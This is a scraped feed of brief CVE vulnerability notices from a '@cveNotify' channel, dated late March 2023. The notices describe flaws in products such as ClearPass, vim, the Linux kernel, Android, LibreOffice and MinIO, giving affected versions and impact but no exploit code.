🚨 CVE-2023-25595A vulnerability exists in the ClearPass OnGuard Ubuntu agent that allows for an attacker with local Ubuntu instance access to potentially obtain sensitive information. Successful Exploitation of this vulnerability allows an attacker to retrieve information that is of a sensitive nature to the ClearPass/OnGuard environment.🎖@cveNotify |
|
| 2023-03-28 17:29:58 |
🚨 CVE-2023-25592Vulnerabilities within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.🎖@cveNotify |
|
| 2023-03-28 17:29:57 |
🚨 CVE-2022-28495TOTOLink outdoor CPE CP900 V6.3c.566_B20171026 is discovered to contain a command injection vulnerability in the setWebWlanIdx function via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.🎖@cveNotify |
|
| 2023-03-28 17:29:53 |
🚨 CVE-2023-1176Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.2.2.🎖@cveNotify |
|
| 2023-03-28 17:29:52 |
🚨 CVE-2021-46708The swagger-ui-dist package before 4.1.3 for Node.js could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim.🎖@cveNotify |
|
| 2023-03-28 17:29:51 |
🚨 CVE-2023-25260Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion.🎖@cveNotify |
|
| 2023-03-28 17:29:47 |
🚨 CVE-2023-27701MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /database/sqldel.html.🎖@cveNotify |
|
| 2023-03-28 17:29:46 |
🚨 CVE-2022-20467In isBluetoothShareUri of BluetoothOppUtility.java, there is a possible incorrect file read due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-225880741🎖@cveNotify |
|
| 2023-03-28 17:29:45 |
🚨 CVE-2022-42916In curl before 7.86.0, the HSTS check could be bypassed to trick it into staying with HTTP. Using its HSTS support, curl can be instructed to use HTTPS directly (instead of using an insecure cleartext HTTP step) even when HTTP is provided in the URL. This mechanism could be bypassed if the host name in the given URL uses IDN characters that get replaced with ASCII counterparts as part of the IDN conversion, e.g., using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop of U+002E (.). The earliest affected version is 7.77.0 2021-05-26.🎖@cveNotify |
|
| 2023-03-28 17:29:44 |
🚨 CVE-2023-22881Zoom clients before version 5.13.5 contain a STUN parsing vulnerability. A malicious actor could send specially crafted UDP traffic to a victim Zoom client to remotely cause the client to crash, causing a denial of service.🎖@cveNotify |
|
| 2023-03-28 15:29:57 |
🚨 CVE-2023-20859In Spring Vault, versions 3.0.x prior to 3.0.2 and versions 2.3.x prior to 2.3.3 and older versions, an application is vulnerable to insertion of sensitive information into a log file when it attempts to revoke a Vault batch token.🎖@cveNotify |
|
| 2023-03-28 15:29:56 |
🚨 CVE-2023-1613A vulnerability has been found in Rebuild up to 3.2.3 and classified as problematic. This vulnerability affects unknown code of the file /feeds/post/publish. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-223744.🎖@cveNotify |
|
| 2023-03-28 15:29:55 |
🚨 CVE-2022-20542In parseParamsBlob of types.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-238083570🎖@cveNotify |
|
| 2023-03-28 15:29:54 |
🚨 CVE-2022-20532In parseTrackFragmentRun() of MPEG4Extractor.cpp, there is a possible out of bounds read due to an integer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-232242894🎖@cveNotify |
|
| 2023-03-28 15:29:50 |
🚨 CVE-2023-1608A vulnerability was found in Zhong Bang CRMEB Java up to 1.3.4. It has been declared as critical. This vulnerability affects the function getAdminList of the file /api/admin/store/product/list. The manipulation of the argument cateId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-223738 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-28 15:29:49 |
🚨 CVE-2022-3683A vulnerability exists in the SDM600 API web services authorization validation implementation. An attacker who successfully exploits the vulnerability could read data directly from a data store that is not restricted, or insufficiently protected, having access to sensitive data. This issue affects: All SDM600 versions prior to version 1.2 FP3 HF4 (Build Nr. 1.2.23000.291) List of CPEs: * cpe:2.3:a:hitachienergy:sdm600:1.0:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.1:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.9002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.10002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.11002.149:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.12002.222:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.13002.72:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.44:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.92:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.108:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.182:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.342:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.447:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.481:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.506:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.566:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.20000.3174:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.291:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.931:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.105:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.23000.291:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-03-28 15:29:48 |
🚨 CVE-2022-3684A vulnerability exists in a SDM600 endpoint. An attacker could exploit this vulnerability by running multiple parallel requests, the SDM600 web services become busy rendering the application unresponsive. This issue affects: All SDM600 versions prior to version 1.2 FP3 HF4 (Build Nr. 1.2.23000.291) List of CPEs: * cpe:2.3:a:hitachienergy:sdm600:1.0:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.1:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.9002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.10002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.11002.149:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.12002.222:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.13002.72:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.44:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.92:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.108:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.182:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.342:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.447:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.481:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.506:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.566:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.20000.3174:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.291:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.931:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.105:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.23000.291:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-03-28 15:29:44 |
🚨 CVE-2022-3686A vulnerability exists in a SDM600 endpoint. An attacker could exploit this vulnerability by running multiple parallel requests, the SDM600 web services become busy rendering the application unresponsive. This issue affects: All SDM600 versions prior to version 1.2 FP3 HF4 (Build Nr. 1.2.23000.291) List of CPEs: * cpe:2.3:a:hitachienergy:sdm600:1.0:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.1:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.9002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.10002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.11002.149:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.12002.222:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.13002.72:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.44:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.92:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.108:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.182:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.342:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.447:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.481:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.506:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.566:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.20000.3174:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.291:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.931:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.105:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.23000.291:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-03-28 15:29:43 |
🚨 CVE-2023-28326Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.0.0 before 7.0.0 Description: Attacker can elevate their privileges in any room🎖@cveNotify |
|
| 2023-03-28 15:29:42 |
🚨 CVE-2023-26360Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-03-28 15:29:38 |
🚨 CVE-2023-26359Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-03-28 15:29:37 |
🚨 CVE-2023-25195Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache Fineract. Authorized users with limited permissions can gain access to server and may be able to use server for any outbound traffic. This issue affects Apache Fineract: from 1.4 through 1.8.3.🎖@cveNotify |
|
| 2023-03-28 15:29:36 |
🚨 CVE-2023-25197Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation apache fineract. Authorized users may be able to exploit this for limited impact on components. This issue affects apache fineract: from 1.4 through 1.8.2.🎖@cveNotify |
|
| 2023-03-28 13:29:58 |
🚨 CVE-2022-48354The Bluetooth module has a heap out-of-bounds write vulnerability. Successful exploitation of this vulnerability can cause the Bluetooth process to crash.🎖@cveNotify |
|
| 2023-03-28 13:29:57 |
🚨 CVE-2022-48355The Bluetooth module has a heap out-of-bounds read vulnerability. Successful exploitation of this vulnerability can cause the Bluetooth process to crash.🎖@cveNotify |
|
| 2023-03-28 13:29:56 |
🚨 CVE-2022-48357Some products have the double fetch vulnerability. Successful exploitation of this vulnerability may cause denial of service (DoS) attacks to the kernel.🎖@cveNotify |
|
| 2023-03-28 13:29:55 |
🚨 CVE-2022-48358The BatteryHealthActivity has a redirection vulnerability. Successful exploitation of this vulnerability by a malicious app can cause service exceptions.🎖@cveNotify |
|
| 2023-03-28 13:29:51 |
🚨 CVE-2022-48360The facial recognition module has a vulnerability in file permission control. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-03-28 13:29:50 |
🚨 CVE-2022-48361The Always On Display (AOD) has a path traversal vulnerability in theme files. Successful exploitation of this vulnerability may cause a failure in reading AOD theme resources.🎖@cveNotify |
|
| 2023-03-28 13:29:49 |
🚨 CVE-2023-0210A bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems.🎖@cveNotify |
|
| 2023-03-28 13:29:45 |
🚨 CVE-2023-0326An issue has been discovered in GitLab DAST API scanner affecting all versions starting from 1.6.50 before 2.11.0, where Authorization headers was leaked in vulnerability report evidence.🎖@cveNotify |
|
| 2023-03-28 13:29:44 |
🚨 CVE-2023-1637A flaw that boot CPU could be vulnerable for the speculative execution behavior kind of attacks in the Linux kernel X86 CPU Power management options functionality was found in the way user resuming CPU from suspend-to-RAM. A local user could use this flaw to potentially get unauthorized access to some memory of the CPU similar to the speculative execution behavior kind of attacks.🎖@cveNotify |
|
| 2023-03-28 13:29:43 |
🚨 CVE-2021-3923A flaw was found in the Linux kernel's implementation of RDMA over infiniband. An attacker with a privileged local account can leak kernel stack information when issuing commands to the /dev/infiniband/rdma_cm device node. While this access is unlikely to leak sensitive user information, it can be further used to defeat existing kernel protection mechanisms.🎖@cveNotify |
|
| 2023-03-28 13:29:42 |
🚨 CVE-2023-1074A memory leak flaw was found in the Linux kernel's Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service.🎖@cveNotify |
|
| 2023-03-28 13:29:38 |
🚨 CVE-2023-1076A flaw was found in the Linux Kernel. The tun/tap sockets have their socket UID hardcoded to 0 due to a type confusion in their initialization function. While it will be often correct, as tuntap devices require CAP_NET_ADMIN, it may not always be the case, e.g., a non-root user only having that capability. This would make tun/tap sockets being incorrectly treated in filtering/routing decisions, possibly bypassing network filters.🎖@cveNotify |
|
| 2023-03-28 13:29:37 |
🚨 CVE-2023-1077In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption.🎖@cveNotify |
|
| 2023-03-28 13:29:36 |
🚨 CVE-2023-1666A vulnerability has been found in SourceCodester Automatic Question Paper Generator System 1.0 and classified as critical. This vulnerability affects unknown code of the file users/classes/view_class.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224104.🎖@cveNotify |
|
| 2023-03-28 13:29:35 |
🚨 CVE-2023-24366An arbitrary file download vulnerability in rConfig v6.8.0 allows attackers to download sensitive files via a crafted HTTP request.🎖@cveNotify |
|
| 2023-03-28 11:31:21 |
🚨 CVE-2023-0512Divide By Zero in GitHub repository vim/vim prior to 9.0.1247.🎖@cveNotify |
|
| 2023-03-28 11:31:20 |
🚨 CVE-2023-0433Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225.🎖@cveNotify |
|
| 2023-03-28 11:31:19 |
🚨 CVE-2023-0288Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1189.🎖@cveNotify |
|
| 2023-03-28 11:31:15 |
🚨 CVE-2023-0054Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1145.🎖@cveNotify |
|
| 2023-03-28 11:31:14 |
🚨 CVE-2023-0051Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1144.🎖@cveNotify |
|
| 2023-03-28 11:31:13 |
🚨 CVE-2023-0049Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143.🎖@cveNotify |
|
| 2023-03-28 11:31:12 |
🚨 CVE-2022-26702A use after free issue was addressed with improved memory management. This issue is fixed in watchOS 8.6, tvOS 15.5, iOS 15.5 and iPadOS 15.5. An application may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-03-28 11:31:11 |
🚨 CVE-2023-23330amano Xparc parking solutions 7.1.3879 was discovered to be vulnerable to local file inclusion.🎖@cveNotify |
|
| 2023-03-28 11:31:07 |
🚨 CVE-2023-25262Stimulsoft GmbH Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Server Side Request Forgery (SSRF). TThe Reporting Designer (Web) offers the possibility to embed sources from external locations. If the user chooses an external location, the request to that resource is performed by the server rather than the client. Therefore, the server causes outbound traffic and potentially imports data. An attacker may also leverage this behaviour to exfiltrate data of machines on the internal network of the server hosting the Stimulsoft Reporting Designer (Web).🎖@cveNotify |
|
| 2023-03-28 11:31:06 |
🚨 CVE-2023-27700MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /accessory/picdel.html.🎖@cveNotify |
|
| 2023-03-28 11:31:05 |
🚨 CVE-2023-28329Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers).🎖@cveNotify |
|
| 2023-03-28 11:31:04 |
🚨 CVE-2023-28330Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default.🎖@cveNotify |
|
| 2023-03-28 11:31:00 |
🚨 CVE-2023-28331Content output by the database auto-linking filter required additional sanitizing to prevent an XSS risk.🎖@cveNotify |
|
| 2023-03-28 11:30:59 |
🚨 CVE-2023-28610The update process in OMICRON StationGuard and OMICRON StationScout before 2.21 can be exploited by providing a modified firmware update image. This allows a remote attacker to gain root access to the system.🎖@cveNotify |
|
| 2023-03-28 11:30:58 |
🚨 CVE-2023-20986In btm_ble_clear_resolving_list_complete of btm_ble_privacy.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-255304475🎖@cveNotify |
|
| 2023-03-28 11:30:57 |
🚨 CVE-2023-20983In btm_ble_rand_enc_complete of btm_sec.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-260569449🎖@cveNotify |
|
| 2023-03-27 17:29:42 |
🚨 CVE-2023-1133Delta Electronics InfraSuite Device Master versions prior to 1.0.5 contain a vulnerability in which the Device-status service listens on port 10100/ UDP by default. The service accepts the unverified UDP packets and deserializes the content, which could allow an unauthenticated attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-03-27 17:29:41 |
🚨 CVE-2023-1133Delta Electronics InfraSuite Device Master versions prior to 1.0.5 contain a vulnerability in which the Device-status service listens on port 10100/ UDP by default. The service accepts the unverified UDP packets and deserializes the content, which could allow an unauthenticated attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-03-27 15:29:38 |
🚨 CVE-2023-27842Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php compenent🎖@cveNotify |
|
| 2023-03-27 15:29:37 |
🚨 CVE-2023-27754vox2mesh 1.0 has stack-overflow in main.cpp, this is stack-overflow caused by incorrect use of memcpy() funciton. The flow allows an attacker to cause a denial of service (abort) via a crafted file.🎖@cveNotify |
|
| 2023-03-27 15:29:36 |
🚨 CVE-2022-4126Use of Default Password vulnerability in ABB RCCMD on Windows, Linux, MacOS allows Try Common or Default Usernames and Passwords.This issue affects RCCMD: before 4.40 230207.🎖@cveNotify |
|
| 2023-03-27 10:29:50 |
🚨 CVE-2023-1456A vulnerability, which was classified as critical, has been found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. This issue affects some unknown processing of the component NAT Configuration Handler. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier VDB-223301 was assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.🎖@cveNotify |
|
| 2023-03-27 10:29:49 |
🚨 CVE-2022-4126Use of Default Password vulnerability in ABB RCCMD on Windows, Linux, MacOS allows Try Common or Default Usernames and Passwords.This issue affects RCCMD: before 4.40 230207.🎖@cveNotify |
|
| 2023-03-27 06:29:58 |
🚨 CVE-2023-22880Zoom for Windows clients before version 5.13.3, Zoom Rooms for Windows clients before version 5.13.5 and Zoom VDI for Windows clients before 5.13.1 contain an information disclosure vulnerability. A recent update to the Microsoft Edge WebView2 runtime used by the affected Zoom clients, transmitted text to Microsoft’s online Spellcheck service instead of the local Windows Spellcheck. Updating Zoom remediates this vulnerability by disabling the feature. Updating Microsoft Edge WebView2 Runtime to at least version 109.0.1481.0 and restarting Zoom remediates this vulnerability by updating Microsoft’s telemetry behavior.🎖@cveNotify |
|
| 2023-03-27 06:29:54 |
🚨 CVE-2018-25083The pullit package before 1.4.0 for Node.js allows OS Command Injection because eval is used on an attacker-supplied Git branch name.🎖@cveNotify |
|
| 2023-03-27 06:29:53 |
🚨 CVE-2023-28883In Cerebrate 1.13, a blind SQL injection exists in the searchAll API endpoint.🎖@cveNotify |
|
| 2023-03-27 06:29:52 |
🚨 CVE-2023-28866In the Linux kernel through 6.2.8, net/bluetooth/hci_sync.c allows out-of-bounds access because amp_init1[] and amp_init2[] are supposed to have an intentionally invalid element, but do not.🎖@cveNotify |
|
| 2023-03-27 06:29:48 |
🚨 CVE-2023-28867In GraphQL Java (aka graphql-java) before 20.1, an attacker can send a crafted GraphQL query that causes stack consumption. The fixed versions are 20.1, 19.4, 18.4, 17.5, and 0.0.0-2023-03-20T01-49-44-80e3135.🎖@cveNotify |
|
| 2023-03-27 06:29:47 |
🚨 CVE-2023-28432Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.🎖@cveNotify |
|
| 2023-03-27 06:29:46 |
🚨 CVE-2022-42332x86 shadow plus log-dirty mode use-after-free In environments where host assisted address translation is necessary but Hardware Assisted Paging (HAP) is unavailable, Xen will run guests in so called shadow mode. Shadow mode maintains a pool of memory used for both shadow page tables as well as auxiliary data structures. To migrate or snapshot guests, Xen additionally runs them in so called log-dirty mode. The data structures needed by the log-dirty tracking are part of aformentioned auxiliary data. In order to keep error handling efforts within reasonable bounds, for operations which may require memory allocations shadow mode logic ensures up front that enough memory is available for the worst case requirements. Unfortunately, while page table memory is properly accounted for on the code path requiring the potential establishing of new shadows, demands by the log-dirty infrastructure were not taken into consideration. As a result, just established shadow page tables could be freed again immediately, while other code is still accessing them on the assumption that they would remain allocated.🎖@cveNotify |
|
| 2023-03-27 06:29:45 |
🚨 CVE-2022-42333x86/HVM pinned cache attributes mis-handling T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] To allow cachability control for HVM guests with passed through devices, an interface exists to explicitly override defaults which would otherwise be put in place. While not exposed to the affected guests themselves, the interface specifically exists for domains controlling such guests. This interface may therefore be used by not fully privileged entities, e.g. qemu running deprivileged in Dom0 or qemu running in a so called stub-domain. With this exposure it is an issue that - the number of the such controlled regions was unbounded (CVE-2022-42333), - installation and removal of such regions was not properly serialized (CVE-2022-42334).🎖@cveNotify |
|
| 2023-03-27 00:30:00 |
🚨 CVE-2023-1644A vulnerability was found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this issue is the function 0x8018E010 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224024.🎖@cveNotify |
|
| 2023-03-27 00:29:59 |
🚨 CVE-2023-1645A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been classified as problematic. This affects the function 0x8018E008 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-224025 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:57 |
🚨 CVE-2023-1646A vulnerability was found in IObit Malware Fighter 9.4.0.776. It has been declared as critical. This vulnerability affects the function 0x8018E000/0x8018E004 in the library IMFCameraProtect.sys of the component IOCTL Handler. The manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224026 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:56 |
🚨 CVE-2022-3140LibreOffice supports Office URI Schemes to enable browser integration of LibreOffice with MS SharePoint server. An additional scheme 'vnd.libreoffice.command' specific to LibreOffice was added. In the affected versions of LibreOffice links using that scheme could be constructed to call internal macros with arbitrary arguments. Which when clicked on, or activated by document events, could result in arbitrary script execution without warning. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.1; 7.3 versions prior to 7.3.6.🎖@cveNotify |
|
| 2023-03-27 00:29:54 |
🚨 CVE-2022-26305An Improper Certificate Validation vulnerability in LibreOffice existed where determining if a macro was signed by a trusted author was done by only matching the serial number and issuer string of the used certificate with that of a trusted certificate. This is not sufficient to verify that the macro was actually signed with the certificate. An adversary could therefore create an arbitrary certificate with a serial number and an issuer string identical to a trusted certificate which LibreOffice would present as belonging to the trusted author, potentially leading to the user to execute arbitrary code contained in macros improperly trusted. This issue affects: The Document Foundation LibreOffice 7.2 versions prior to 7.2.7; 7.3 versions prior to 7.3.1.🎖@cveNotify |
|
| 2023-03-27 00:29:53 |
🚨 CVE-2022-26306LibreOffice supports the storage of passwords for web connections in the user’s configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in LibreOffice existed where the required initialization vector for encryption was always the same which weakens the security of the encryption making them vulnerable if an attacker has access to the user's configuration data. This issue affects: The Document Foundation LibreOffice 7.2 versions prior to 7.2.7; 7.3 versions prior to 7.3.1.🎖@cveNotify |
|
| 2023-03-27 00:29:51 |
🚨 CVE-2022-26307LibreOffice supports the storage of passwords for web connections in the user’s configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in LibreOffice existed where master key was poorly encoded resulting in weakening its entropy from 128 to 43 bits making the stored passwords vulerable to a brute force attack if an attacker has access to the users stored config. This issue affects: The Document Foundation LibreOffice 7.2 versions prior to 7.2.7; 7.3 versions prior to 7.3.3.🎖@cveNotify |
|
| 2023-03-27 00:29:49 |
🚨 CVE-2021-25636LibreOffice supports digital signatures of ODF documents and macros within documents, presenting visual aids that no alteration of the document occurred since the last signing and that the signature is valid. An Improper Certificate Validation vulnerability in LibreOffice allowed an attacker to create a digitally signed ODF document, by manipulating the documentsignatures.xml or macrosignatures.xml stream within the document to contain both "X509Data" and "KeyValue" children of the "KeyInfo" tag, which when opened caused LibreOffice to verify using the "KeyValue" but to report verification with the unrelated "X509Data" value. This issue affects: The Document Foundation LibreOffice 7.2 versions prior to 7.2.5.🎖@cveNotify |
|
| 2023-03-27 00:29:48 |
🚨 CVE-2023-1640A vulnerability classified as problematic was found in IObit Malware Fighter 9.4.0.776. This vulnerability affects the function 0x222010 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224020.🎖@cveNotify |
|
| 2023-03-27 00:29:46 |
🚨 CVE-2023-1640A vulnerability classified as problematic was found in IObit Malware Fighter 9.4.0.776. This vulnerability affects the function 0x222010 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224020.🎖@cveNotify |
|
| 2023-03-27 00:29:45 |
🚨 CVE-2023-1641A vulnerability, which was classified as problematic, has been found in IObit Malware Fighter 9.4.0.776. This issue affects the function 0x222018 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-224021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:43 |
